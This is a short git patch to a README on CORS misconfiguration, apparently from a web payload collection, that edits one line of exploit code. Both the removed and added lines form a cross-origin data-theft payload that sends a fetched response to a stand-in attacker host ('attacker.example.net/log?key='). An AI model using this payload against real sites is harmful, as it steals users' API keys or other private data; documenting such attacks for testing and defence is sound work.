From 48fcdeb7ca83c147d09734b5ad28bc48d6dd4b2f Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 14:38:52 +0200 Subject: [PATCH] Some clarification in the exploit code --- CORS Misconfiguration/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 98f3573..d224ea5 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -112,7 +112,7 @@ origin in the request: req.send(); function reqListener() { - location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText); + location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText); }; "> ```